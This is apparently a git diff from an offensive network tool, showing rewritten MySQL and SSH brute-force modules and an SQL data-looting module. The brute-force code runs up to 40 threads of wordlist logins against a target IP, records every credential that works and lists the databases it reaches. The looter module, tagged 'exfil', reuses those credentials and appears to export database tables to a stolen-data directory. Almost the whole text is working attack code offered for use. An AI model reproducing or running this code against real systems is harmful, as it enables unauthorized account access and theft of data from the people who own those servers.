sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) supplied by the orchestrator
- IP -> (MAC, hostname) via DB.hosts
- Connect without a database, then SHOW DATABASES; one entry per database found
- Successes -> DB.creds (service='sql', database=<db>)
- Keeps the existing logic (pymysql, queue/threads)
"""
import os
import pymysql
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
b_class = "SQLBruteforce"
b_module = "sql_bruteforce"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
b_service = '["sql"]'
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
class SQLBruteforce:
"""Wrapper orchestrateur -> SQLConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_bruteforce = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""Lance le bruteforce SQL pour (ip, port)."""
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database]
self.queue = Queue()
# ---------- file utilities ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- DB hosts mapping ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str):
"""
Connect without a database, then SHOW DATABASES; returns (True, [dbs]) or (False, []).
"""
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
try:
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
finally:
try:
conn.close()
except Exception:
pass
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
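# Illustrative return values (sketch): with valid credentials on a typical MySQL
# server this yields something like
#   (True, ['information_schema', 'mysql', 'performance_schema', ...])
# and (False, []) when authentication is rejected.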
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('sql',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='sql'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread to process SQL bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_sql", 0) > 0:
time.sleep(self.shared_data.timewait_sql)
def run_bruteforce(self, adresse_ip: str, port: int):
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
# ---------- DB persistence ----------
def save_results(self):
# for each database found, create/update a row in creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
try:
self.shared_data.db.insert_cred(
service="sql",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=dbname,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=dbname
)
else:
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
self.results = []
def remove_duplicates(self):
# unnecessary with the unique index; kept for compatibility.
pass
if __name__ == "__main__":
try:
sd = SharedData()
sql_bruteforce = SQLBruteforce(sd)
logger.info("SQL brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,204 +0,0 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# First attempt without specifying a database
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# If the connection succeeds, fetch the list of databases
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Save the information along with the list of databases found
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Add an entry for each database found
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

315
actions/ssh_bruteforce.py Normal file
View File

@@ -0,0 +1,315 @@
"""
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
to find accessible accounts using various user credentials. It logs the results of
successful connections.
SQL version (minimal changes):
- Targets still provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
"""
import os
import paramiko
import socket
import threading
import logging
import time
from datetime import datetime
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
# Silence Paramiko internals
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
"paramiko.kex", "paramiko.auth_handler"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_bruteforce"
b_status = "brute_force_ssh"
b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
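# Illustrative sketch only (not part of this module): one plausible way scheduler-side
# code could read the b_rate_limit descriptor above. The real parsing lives in the
# scheduler; the "count/window-in-seconds" interpretation is an assumption drawn from
# the comments ('3/86400' ~ at most 3 runs per day).
def _parse_rate_limit(spec: str):
    """Parse 'N/SECONDS' (e.g. '3/86400') into (max_runs, window_seconds)."""
    count, window = spec.split("/", 1)
    return int(count), int(window)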
class SSHBruteforce:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_bruteforce = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""Run the SSH brute force attack on the given IP and port."""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Execute the brute force attack and update status (for UI badge)."""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjorn_orch_status = "SSHBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": port}
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""Handles the connection attempts and DB persistence."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Load wordlists (unchanged behavior)
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Build initial IP -> (MAC, hostname) cache from DB
self._ip_to_identity = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
# ---- Mapping helpers (DB) ------------------------------------------------
def _refresh_ip_identity_cache(self):
"""Load IPs from DB and map them to (mac, current_hostname)."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---- File utils ----------------------------------------------------------
@staticmethod
def _read_lines(path: str):
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---- SSH core ------------------------------------------------------------
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(
hostname=adresse_ip,
username=user,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
look_for_keys=False, # avoid slow key probing
allow_agent=False, # avoid SSH agent delays
)
return True
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
return False
except Exception as e:
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
return False
finally:
try:
ssh.close()
except Exception:
pass
# ---- Robust DB upsert fallback ------------------------------------------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
"""
Insert-or-update without relying on ON CONFLICT columns.
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
"""
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
# 1) Insert if missing
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ssh',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
# 2) Update password/hostname if present (or just inserted)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ssh'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---- Worker / Queue / Threads -------------------------------------------
def worker(self, success_flag):
"""Worker thread to process items in the queue (bruteforce attempts)."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ssh_connect(adresse_ip, user, password, port=port):
with self.lock:
# Persist success into DB.creds
try:
self.shared_data.db.insert_cred(
service="ssh",
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
# Specific fix: fallback manual upsert
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None
)
else:
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
time.sleep(self.shared_data.timewait_ssh)
def run_bruteforce(self, adresse_ip, port):
"""
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
# clear queue
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if any
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("SSH brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,198 +0,0 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

View File

@@ -1,189 +1,252 @@
"""
steal_data_sql.py — SQL data looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
- DB.creds (service='sql') provides (user,password, database?).
- We connect first without DB to enumerate tables (excluding system schemas),
then connect per schema to export CSVs.
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
"""
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
import csv
from threading import Timer
from typing import List, Tuple, Dict, Optional
from sqlalchemy import create_engine, text
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 60 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "1/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
"""
Return list[(user,password,database)] for SQL service.
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
d = row.get("database")
d = str(d).strip() if d is not None else None
key = (u, p, d or "")
if not u or (key in seen):
continue
seen.add(key)
out.append((u, p, d))
return out
